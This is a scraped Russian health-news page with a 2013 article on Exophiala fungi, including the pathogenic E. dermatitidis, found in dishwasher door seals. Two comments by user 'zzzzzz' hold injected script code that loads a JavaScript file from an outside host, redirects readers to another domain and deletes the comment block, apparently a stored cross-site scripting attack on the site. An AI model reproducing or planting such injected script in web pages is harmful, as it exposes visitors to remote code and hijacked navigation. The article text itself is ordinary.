Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ваша посудомоечная машина...  >>  Ваша посудомоечная машина пытается вас убить
 
Обратная связь
 

Ваша посудомоечная машина пытается вас убить

Размер шрифта
10 декабря 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили опасный грибок в одном из самых распространенных представителей бытовой техники.

Ваша посудомоечная машина пытается вас убить

Оказалось, что в посудомоечных машинах преспокойно живут и размножаются так называемые экстремотолерантные бактерии (устойчивые к суровым условиям внешней среды). Некоторые из них могут представлять собой серьезную угрозу для человеческого здоровья.

Быт современного человека становится все более зависимым от электрических приборов, будь то посудомоечная машина, кофе-машина, мультиварка и тому подобные. Все эти устройства создают жаркую и влажную среду. В посудомоечных машинах к этому добавляются также агрессивные детергенты и высокие концентрации солей, которые используются в каждом рабочем цикле.

В вышеупомянутом исследовании ученые действовали по-крупному: они брали опытные образцы из посудомоечных машин частных лиц из 101 города на шести континентах. Выяснилось, что 62% аппаратов содержали грибок на прорезиненной полоске дверцы. В основном обнаруженные микроорганизмы относились к роду Exophiala, который известен своей невероятной устойчивостью к внешним воздействиям. Они выживают в настоящем пекле, а также в концентрированных растворах солей, кислот и щелочей.

Один из представителей рода ExophialaE. dermatitidis – является болезнетворным для человека, причем это касается лиц не только с иммунодефицитом, но и вполне здоровых.

У пациентов с муковисцидозом этот грибок вызывает тяжелое поражение легких.

Таким образом, обнаружение этих микроорганизмов внутри посудомоечных машин свидетельствует о том, что они проделали огромный эволюционный путь, став агрессивнее, опаснее и устойчивее. Будьте осторожны и внимательны, не пренебрегайте должным уходом за своей посудомоечной машиной.

Результаты исследования были опубликованы в британском журнале «Fungal biology» («Биология грибов»), издательство «Elsevier».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:50

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всемирная неделя первичного иммунодефицита начинается в Москве!   Как сохранить вашу любимую обувь и не заболеть?   Проблемы с ногами? Ученые говорят, что в этом виноваты вы сами!   Как не зарасти грибком  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Как не покрыться грибком?
Грибок, который гарантирует, что вы останетесь без секса!
Как любимые туфли портят вам жизнь

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.